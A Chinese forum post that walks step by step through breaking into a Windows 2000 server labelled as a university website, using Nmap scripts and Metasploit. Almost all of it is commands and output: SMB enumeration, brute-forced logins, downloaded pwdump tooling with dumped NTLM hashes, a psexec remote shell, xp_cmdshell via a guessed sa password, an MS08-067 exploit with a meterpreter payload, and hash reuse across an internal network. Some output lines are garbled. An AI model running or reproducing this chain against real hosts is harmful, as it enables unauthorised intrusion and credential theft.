广西师范网站http://202.103.242.241/
- n# c9 U" O0 P b* n# w3 x8 v; g! B+ q& a9 _ R
root@bt:~# nmap -sS -sV 202.103.242.241* n2 g% @0 x5 A: v9 z
; x# N& M: ~3 @' _' O! tStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST- o) l: R _: p; b: S
( |/ I9 @$ M' j0 |% r8 x+ g9 [
Nmap scan report for bogon (202.103.242.241)1 P/ ^; T* F$ V! c1 e
$ k$ f: C( n" N) L$ m
Host is up (0.00048s latency).
1 X0 T) q; c/ E$ |5 n% i: D+ L; A! W% {' g5 A) Z( k& A+ ^
Not shown: 993 closed ports) ]- ^: I& p, n! C% i
) U3 O4 L( L) K W0 gPORT STATE SERVICE VERSION
9 U) d+ _" u! Q) k+ J& G
7 L W; x- b! F a- a' A135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
3 L8 b5 ?$ |5 k8 C" a9 R* T* w# P
) k* _ {$ F# T4 P6 F6 K T0 ]" X139/tcp open netbios-ssn
, W: Q# \: S$ O2 t9 c. h3 O6 Y ^( l1 t2 d6 z( c Z
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
) l/ [/ R& s3 |
: J8 X) p" W, D+ C) ?. A1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe); c4 Y# `+ I2 V; w
0 q; r/ T# J. f
1026/tcp open msrpc Microsoft Windows RPC
! [7 r, b/ l+ l4 T! ]" _4 V8 L% |" w: ]9 }# W+ s) {
3372/tcp open msdtc?- W& ?0 F2 x/ P: t$ A
$ w& H+ k4 ~3 m- H9 M3 n, a
3389/tcp open ms-term-serv?3 D8 `: p) l& z
* [* O7 O0 i0 B' s4 c' K4 { H& m
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
& ?! ~! {5 b" W; w W9 VSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r8 m( F7 i( w# R M- ]' D4 ]
0 X7 i3 y1 m2 m* P2 NSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
% u& _. B/ {, S7 b+ _: ~
! Y* l1 k( z1 m1 E: o" ^( b3 }7 \ VSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
! H9 x: i/ [+ v; ^
+ c2 J- I" N3 @3 n8 e$ sSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO4 y* j3 c3 q3 e# a+ G4 R
1 z! F e& n* ~3 b, G
SF:ptions,6,”hO\n\x000Z”);$ t* R' n4 L# o- o4 J/ W
' r; g6 v& _9 O; k4 p# \( }3 z
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems), T( `) c+ Z& i8 q3 U; h" {/ S
. _& w# Q9 k: r# b! k, {" tService Info: OS: Windows b, @7 P) q* ~5 W
; T2 e. u$ j' W/ ?" z/ a* Z
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .' }9 N: r! M2 i" z, B
6 W" B- M: B8 w$ K2 P- D. Z# O1 d8 QNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
7 T* C; N7 A- a9 Q# K- Q/ v8 K6 \7 i% s4 T; T3 N( V
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本9 D) ?- w& c, ]: c% k7 o8 l2 S) x
! j4 g, d- `7 s( `. `
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse& m. Z4 B g! C' {5 j a
" {. `- i# @) u! l, ?9 d-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
" o$ w, d* E1 g; w6 D& Q3 n) d3 K# z* n# h; t
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
3 z; g7 ~# L, ]) [" J
1 z$ u1 _* R6 u4 Y! y* P8 j-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
' V4 T! \6 r0 J; R9 z1 Q( o1 p3 N" K' k3 V" f3 x; ]
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
( T" u% c9 n6 ~$ ]( b4 W( j
% t1 b6 Q; ~- s% i-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
+ m* U* R9 I* M1 |) E5 |
8 W& \+ b+ D3 c- a8 J-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
6 t% @5 X& s% [& p! l' r V! i* P$ w7 N1 L6 V& L7 y, |) X, n
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
# i$ Q: ]$ M0 U8 C- k5 ]- M, n" m! Y) h$ N0 T9 H0 T
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
6 ?5 N [; K% R% B6 Y( L- c8 p [4 A2 [& S0 v: P
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse8 X! S% f; I6 m4 a+ y1 N
+ U" q E, H4 ?3 q( O
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
, a2 X5 l. i5 J6 t2 ]; G. C5 H% y; N& a( S
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
* s- Q5 g9 f1 [( ^+ }* Y! M3 j+ g: E/ E
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse! H4 T: r2 v( @7 Z+ N0 b. |8 P
) O* t6 B+ |. J" \" B3 c/ P-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
( }; a6 Q1 P9 e6 a! P3 w+ f, Q; w$ ~ H7 [) `
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
. H9 [) }" i$ S! ^6 e& k- n+ E f# r H9 {" Q/ ` Q
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
; G Q1 M4 Z1 K. v# n9 ~: |" k3 f8 y# F8 E3 \
//此乃使用脚本扫描远程机器所存在的账户名, f0 ~* L4 Z* O: O0 ]7 x! w5 ~" D
4 `1 H/ t$ \8 [/ @7 A" I% E3 ~
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST/ g1 W- ^. ~' n$ ?& {, q
" r1 v! _. T) M: L% p/ [
Nmap scan report for bogon (202.103.242.241)
. S# d" @4 O3 \
* Y/ N3 R% W" D0 E# `6 yHost is up (0.00038s latency).4 a6 z& H3 O6 X8 P& f1 B& J
" X: |: N# l2 {& U, _Not shown: 993 closed ports
5 r$ W! a' s7 W
7 S$ I0 g8 X* N+ bPORT STATE SERVICE
# q% ~3 C# i* [$ T: \; D. e# D: y s5 o8 d7 o2 G) K) s* P+ Z8 Z
135/tcp open msrpc U# `+ }, x& R3 ^! u2 b. I
3 U' t% s; X( e5 g$ Z+ X139/tcp open netbios-ssn
" S( {! b ?) g/ Q, r
" ~; D- I3 c6 [8 R6 Z0 x' ~445/tcp open microsoft-ds6 p3 \* E7 E' R. P& C8 I
% Z1 n& o" R6 b; C! G. D U1025/tcp open NFS-or-IIS# v: e Z: Q# a3 G0 d( }! D
. V2 A3 [* m: m2 Q
1026/tcp open LSA-or-nterm$ Q# B: S6 n9 Q0 p1 Q3 Z
- I; i' @6 {& f+ Z3372/tcp open msdtc! A! F7 S! ^$ G1 ?$ D, a" B
# R- m2 M( p7 J/ s" k- s, ?
3389/tcp open ms-term-serv& U$ A% ^0 A T# c/ Q, X
) P3 T3 o. }0 o+ s. a0 U: R u) @
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
4 i" Z+ U) X" y# O- c$ L5 t$ g, `: t; g; @$ F& E9 {; n' s/ a
Host script results:
: ^* Z8 x' K) R u( a6 j' O) U0 n5 s# O$ p; x
| smb-enum-users:; E5 u2 C0 n# q/ r% N4 {$ x
) I5 B# _- t! c|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
/ R( k0 G$ ~& c2 i- Q7 c$ y7 ~+ B f- }6 T5 E
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
( R0 {# F9 q6 p* h+ {# t1 U' L9 T+ W& K
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 $ x W4 Q% @% `) s! r
" d5 c5 B4 G: }% q/ K+ W//查看共享. i. f1 x) n. j. a) p T9 N
( f0 V, J, g+ s4 k1 f
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
( x$ V" W. ^0 f& n9 V- W) ^; s# `7 ^2 f2 k$ ^6 C$ ^: n- k
Nmap scan report for bogon (202.103.242.241)
. a* M$ d( F" P4 \0 v- H2 u) ~6 f! V% _$ P: ?, N$ W
Host is up (0.00035s latency).
0 c8 U* k1 {$ I# k: Z# b1 z+ ?% z4 E" }1 k
Not shown: 993 closed ports
4 }& d5 b7 c! v& C
0 g( i9 R8 d. s2 s2 i5 c1 D" M* dPORT STATE SERVICE. I1 B" F) {8 y. L/ g7 E
8 E% Y$ ~: o) m! }
135/tcp open msrpc
, i2 D+ u. ~/ U
8 t9 B! ]( E4 N& y! k: y/ V139/tcp open netbios-ssn5 K$ C) E2 G% f9 y2 ?4 l( ]9 R5 J
4 T' I' e O Y: c7 W, c3 k0 S445/tcp open microsoft-ds
/ O( K0 ^7 w0 Z8 T/ g- I6 b: F/ j3 O+ C% i
1025/tcp open NFS-or-IIS
+ b4 T% `% M. S) A4 M1 {; h1 |
5 S- h; V" d. z; ^1026/tcp open LSA-or-nterm+ l4 Y& C8 q* U. u! h% A$ }
( _3 T# F% }# |' [9 d1 D" F3372/tcp open msdtc
# `1 k0 `* R4 H
, Y% K7 E& Z8 q0 p b+ G+ v# d3389/tcp open ms-term-serv- ~' o, o: e3 ]
7 I: |* r+ \2 L3 IMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)" V- O5 p9 w8 |) j- M0 V
( F. [! `* d. g0 \4 ]; jHost script results:0 m& A4 m) U" Z% |: I
0 J) c( @0 s" x| smb-enum-shares:! b6 Q4 p1 b+ V, Q
# O& [( i* {( l9 A
| ADMIN$' }# d! c- X' K" E- n( Y ~2 h2 ]
) u N$ _# V' P' v) d
| Anonymous access: <none>
( U: d/ i$ {7 \* c2 I7 P/ m- P
5 x% ?* N* s. ?| C$5 w4 v. A; F# w' h/ O* I
3 m6 w8 d4 K. e3 n* z& T| Anonymous access: <none>
& W. z9 o! s; X: d: @% S: o: C6 {. b& Z1 L6 x
| IPC$
* e- e* _) p, r. n3 y, U. c) r% e
f8 a4 n% S" t& c3 _) x|_ Anonymous access: READ O* }9 o9 x# S6 [, O! b" v
" a& k* M! W8 [3 w( O0 n+ ]Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds+ o) X! t1 X* {+ I. K G
% [' H2 k; x+ K; M+ T; i' kroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 # o3 U2 q2 b, ~& y
6 J/ M" i$ R s
//获取用户密码
& n, H4 l( R6 D: }" O' Y- t
d/ b# E( I+ G; _5 xStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST- O/ {: x9 _0 h& Q4 G8 Z8 k
* U; s6 _9 B; l" nNmap scan report for bogon (202.103.242.2418)
0 [* _6 Z3 N1 y0 r) l: M: u
$ e" F: _; Z/ @Host is up (0.00041s latency).( L- n- o5 g, g, q( c6 J) W c# d
5 a7 z0 @2 h/ H& @) o% U0 c$ n0 t
Not shown: 993 closed ports
n Q0 C }* m8 e3 ?+ T6 t+ ^. z
PORT STATE SERVICE7 M+ E9 k: K7 L/ C2 ?
% K5 j. b b6 d. j' E# O135/tcp open msrpc
# m9 b' ^* r- D- ]9 Q( e$ f# h( s. r+ Z6 W& Z' Z
139/tcp open netbios-ssn7 u- S% i1 t$ e6 F' M
$ k& H$ w2 G! u# M$ C% ]445/tcp open microsoft-ds: `; N+ L" b; v, d" J! n
1 W. y5 A A9 C2 j6 b F1025/tcp open NFS-or-IIS
2 C6 s! I# h' T: v
7 t; V5 d& ?! N* A, A. F1026/tcp open LSA-or-nterm
+ P& H6 p( Y+ F3 u3 F- y6 O( R4 Q
( p. O& X0 F% b3372/tcp open msdtc6 ?) ~4 Y/ ?& u2 K* r, {/ |
% L' K' f0 W/ Y8 A& i8 C+ D: ~3389/tcp open ms-term-serv
4 H% j0 e8 p" [4 e5 r0 k; Q8 o
1 c/ M, m7 L& N+ xMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
! K8 T- M% i, _! N) S0 a# X
& a* }/ O2 z6 l p3 R. X' D' tHost script results:0 p6 I, Z/ p$ b+ V q
8 ]# y" X- D. K
| smb-brute:2 ~% {( t7 i$ n: r
: a: H1 A' D- L) R; Eadministrator:<blank> => Login was successful
4 O- ?2 R+ n2 G( N! o2 ~9 L g2 y1 Y' [ b. V. C* w# V
|_ test:123456 => Login was successful. u9 }" j# e: X l/ ~! P* z" O
- i+ k5 n; L( |5 N( _2 `9 D' m; \# d! PNmap done: 1 IP address (1 host up) scanned in 28.22 seconds7 ^( [: `/ P' c, e( s* ^+ S2 J& K: }
/ k+ E2 z* O2 N( o; h
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash. M$ R! D# t7 |/ D
8 W; N8 D; L+ l& q1 d3 e0 _# ]
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data4 ^% V( D/ N) |5 q: W5 V% l5 w3 \" O
- @9 q5 I& Z5 E* U* [( u7 c$ |root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
8 V& W! s' g7 L
" c5 J2 [' i/ x/ M" h. h; O" sroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1395 }. R; S) X6 S7 B# y G# q. T0 o5 C
: I! P# m- l# D
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
+ A! e' a# l+ s
2 r# a# s: R% L5 H) v7 D, h1 }4 gNmap scan report for bogon (202.103.242.241)
1 D- f8 s; n3 Q k C
1 j( Y' p( ]& \+ {9 WHost is up (0.0012s latency).
* M# U# J; p) p9 x; _1 r/ j( ]/ E! {3 ?6 \% E& B3 e
PORT STATE SERVICE* r7 r$ ^7 I% d1 }+ g6 w. b
) ~0 c6 K7 J; b' O7 s& U) r135/tcp open msrpc- s+ c% b) a+ m0 |7 F( e9 z
1 }4 ]; Z" n @. e5 e139/tcp open netbios-ssn
# z5 W9 [5 Q/ V& _/ h/ e' I3 y3 m
445/tcp open microsoft-ds
! M e& p+ Z& _5 N: B# d4 Z" q* Y0 P; N- U. e L+ i: s
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
. n+ L: [2 R7 \1 F; {+ J- [
% s* y) v9 M B6 y$ W* i2 N; jHost script results:5 u% s5 F( Z6 L, K+ c# Q2 J
: h- r! N2 J9 h| smb-pwdump: v0 s: c4 l* T; [" x! `
/ w& X8 P9 Z1 I* Y* a
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************3 Z; x* D/ Q. g/ @7 t/ P* w
8 }/ g. k2 b! e- {9 D Y4 b| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
1 e* t! R9 r4 e
8 A# _7 e' l, Y| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4- z& g8 D5 b3 H. N4 G2 F
5 h3 A' f; x9 e# ~9 J, \- R
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
4 E! f, ~/ Q Q. `" ^6 R, X
/ D8 s: J3 e, l( LNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
, L) S( f" i2 }- o, [
; a6 P) ~+ ?+ F2 FC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
2 V2 \* t: h4 o8 V& @/ q3 I' w) B2 z& |
-p 123456 -e cmd.exe$ J+ h l- K" u% ?$ L
1 {. \; O) W# YPsExec v1.55 – Execute processes remotely
* S8 _9 @" X4 T2 o/ W4 v
9 o/ h2 J" W9 @/ H8 zCopyright (C) 2001-2004 Mark Russinovich; q6 v3 M9 A: c* z& {
+ f8 ~5 C# d: b Q/ w; ]
Sysinternals – www.sysinternals.com
7 \2 u4 s; e, s; T! i
/ t0 w% H3 K$ a9 c# Z2 J5 MMicrosoft Windows 2000 [Version 5.00.2195]
. D; {/ w7 ~/ V! M
' g6 r" z& H) o(C) 版权所有 1985-2000 Microsoft Corp.
8 N: C8 c1 x; @
7 S2 v6 m" M* O/ G, ]C:\WINNT\system32>ipconfig' h9 I7 Y9 ~* V6 B# M! B
; E4 W1 r6 O% V
Windows 2000 IP Configuration1 I1 E: a3 G- o8 @" u# @; ]
^4 E3 ]. L& f7 b6 T# T
Ethernet adapter 本地连接:
$ E/ e( ~) b) B9 F: V3 ?
+ X0 Z+ l/ ~5 V$ lConnection-specific DNS Suffix . :
+ |1 y: v& y) s4 r" T4 J6 N5 h: K) y( `# a
IP Address. . . . . . . . . . . . : 202.103.242.241
6 q, d& ]: _- l# y' u
, H0 \& u. B# b9 \+ q) ySubnet Mask . . . . . . . . . . . : 255.255.255.0* F$ N3 u6 N+ @- r5 Z L# O: K
' H, Q' G" B! ADefault Gateway . . . . . . . . . : 202.103.1.1
2 D, T8 y) l! e9 P1 \8 J4 X; _4 A. [; B) L- c8 l) A
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令' m+ {7 t* S* b; H& C( q
% X! U. h. N. }% _* Yroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
3 J( A/ Z- v/ L0 I( [$ h+ ]9 e. ~, I" I
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST* V2 e/ E1 S/ P( u* r0 g
, A( b0 h4 b t$ g! @: R' w% I4 B* ^Nmap scan report for bogon (202.103.242.241)" {( C# m; \. D& X& P! w
* f* e9 ^7 _3 n
Host is up (0.00046s latency).
2 a: ]3 b& r- f# y% g- J& z7 @7 d" Z
Not shown: 993 closed ports
* U0 I4 o% C6 _/ ?- v
: R, I. Z8 w6 x3 P9 o8 pPORT STATE SERVICE# N0 b' G$ x- L" k% R
# `2 o( _5 n8 ^. {- h3 x135/tcp open msrpc' J. }( _- }7 W
- U% E' L3 l, E" m `# P# T139/tcp open netbios-ssn
! x4 P' Q! ~ Q6 `6 @+ N* ~9 h4 v3 {# ?" V2 S6 V* @: D `
445/tcp open microsoft-ds
. K2 F; z" M5 K% G }+ C$ ~2 _
9 w Q8 U; l$ G1025/tcp open NFS-or-IIS, _; W4 t- _& F
& p; l a4 ~: R$ \- h1 R+ c1026/tcp open LSA-or-nterm
' B! k$ Y) ^: s& T! I, R* s( {3 I) L8 `9 J- s8 P, }, m& A8 T
3372/tcp open msdtc9 J: W9 Q6 F5 G. d% r# G
2 Y5 b. d! c2 ^3389/tcp open ms-term-serv6 M$ W* }; V* F# v: @- t3 L1 x# K
! }' k- K3 e4 Z8 |8 A
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)2 ?2 p' m: G. i$ V4 }- v# B/ P! y
6 A9 _& Z& F4 B
Host script results:
* u: z- h! Y5 S0 d" S4 j# I& y7 g) L% ]& \# I5 f: ]4 ?0 x
| smb-check-vulns:
7 _3 B0 y# q7 `8 E
4 x- I0 k# x) y @4 I|_ MS08-067: VULNERABLE
+ ? q; R9 Y3 H6 O0 S" g; E$ b& @0 O; I5 t& P
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
" b" G6 w) Y A- X$ F
1 e5 x" Y Y1 X: m( i0 H! Z$ }root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出, u7 ^- Z; v) O; B* h# ~9 N
9 k3 n5 f# O( l9 c8 a( D( H: dmsf > search ms08 G! ?& ]1 ~& C, G9 I& S
6 Z: c4 m' D3 I/ G5 |- R8 i; {* J% f
msf > use exploit/windows/smb/ms08_067_netapi2 ^2 |$ J% y- c6 `% ^
9 L# }6 b, J: b; T* D. K2 E5 Rmsf exploit(ms08_067_netapi) > show options7 k" Y. n. _; C8 Y( U
1 k* r* P# H4 w7 A' n" jmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241/ `0 c" g& S. V4 @# `/ s* q) ~
/ J- C! z% M4 l7 Y. mmsf exploit(ms08_067_netapi) > show payloads
$ ^% x; P: [. s; e* M
! c3 B% F) O$ i/ smsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
# t4 \$ h; I |0 b" B! M7 r4 H* N# \0 x: X) M+ p0 ?
msf exploit(ms08_067_netapi) > exploit" N6 r$ `( _3 H. N2 B% P1 c
* M8 Y7 d0 Z I3 X6 Zmeterpreter >, B* D! l" ~ Q' {
! ^# k& l; ?9 {( E3 \ @7 ?% F
Background session 2? [y/N] (ctrl+z)# v$ L- I4 y3 q4 W7 T$ F* i$ E
& n$ ~ Y2 e \3 s5 o& A" ^# I
msf exploit(ms08_067_netapi) > sessions -l
& ?. Q$ @# A% w' ]0 M* P8 T: }. G7 i
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt4 r0 s0 R, U6 D( _) B
; B7 M! P6 I" u' _6 M$ ?) Z$ |test
9 t, Q' m# }* F
" L0 @2 P7 R2 e w _& o: Sadministrator" e* a7 B& ?) Q7 C! T5 Z: g
" }3 _* G" ~6 _" ?
root@bt:/usr/local/share/nmap/scripts# vim password.txt
4 c/ w, `, d. }; ^& Z7 ` v% H+ y
$ L6 C, g5 ]5 a44EFCE164AB921CAAAD3B435B51404EE
5 u- R% P9 v' l/ Z+ K1 @- a' r. N8 \6 P7 G; @1 C5 o( g/ Z3 m% E
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 ' C8 C! b7 S8 N9 R* }$ d. j" L8 l/ \
7 t6 F6 e1 R6 @
//利用用户名跟获取的hash尝试对整段内网进行登录3 {# y0 E+ W) B- E1 {" M: Y
7 R( @0 D: L6 e* u: WNmap scan report for 192.168.1.105
a9 r2 L9 Y6 J* [* K+ `
3 a' k* o- T4 t) C9 BHost is up (0.00088s latency).) S$ m8 _$ Y7 x2 i5 n
% e. `8 i; y: N2 A5 F1 INot shown: 993 closed ports
* E+ P+ Y" g( Z$ u/ s& x' ~5 ~/ C% R8 I% K6 e! ]" b! Y8 b
PORT STATE SERVICE; P" j7 o6 j6 }- m
: C; U: q. v9 k: e6 ]3 W* K( f% c
135/tcp open msrpc0 U% {: K- N+ }" Z0 a0 \$ }
& S8 G- s% G G. O& Y
139/tcp open netbios-ssn3 @& l8 K! v- Y4 i, S" S V7 c
2 x- h0 I) O' f7 I! O, U- I
445/tcp open microsoft-ds3 x" y: K% D6 L3 |4 y- g9 V* N
/ J( u) Q5 A. _5 B4 {1025/tcp open NFS-or-IIS
/ m: F i7 M% u6 U- j. `- v, g6 y5 o- m6 h) ~$ g7 ]
1026/tcp open LSA-or-nterm
1 y4 F5 n' f/ R1 W% ~. Z' p7 X+ A
+ C6 W6 E0 e/ }) t3 u3372/tcp open msdtc
+ L) t/ h" L3 ~1 n" ?( f+ G
2 d% z, f. Q* N2 P; x9 e: i- f3389/tcp open ms-term-serv
4 u! w- D9 B) k& j1 x o9 c4 Z2 S g9 y/ Z$ k
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)! C7 g) C) z2 g6 H( P
8 p' s! D7 e4 S/ e
Host script results:
, Y* l1 Z: A6 p' ^) j7 O
: o' B+ [" F2 T! w| smb-brute:
. F0 ]$ V3 I4 I" I* T; I3 X& p9 G n$ i3 n- f; o
|_ administrator:<blank> => Login was successful
) G8 J8 Z. T6 k. e. z
/ K# ^ g& L4 f$ s7 N攻击成功,一个简单的msf+nmap攻击~~·
5 o" X0 p. e8 r1 X3 V7 K, r& q( B* R2 E' q/ X7 m) N
|
发表于 2012-12-4 12:46:42
收藏
支持
反对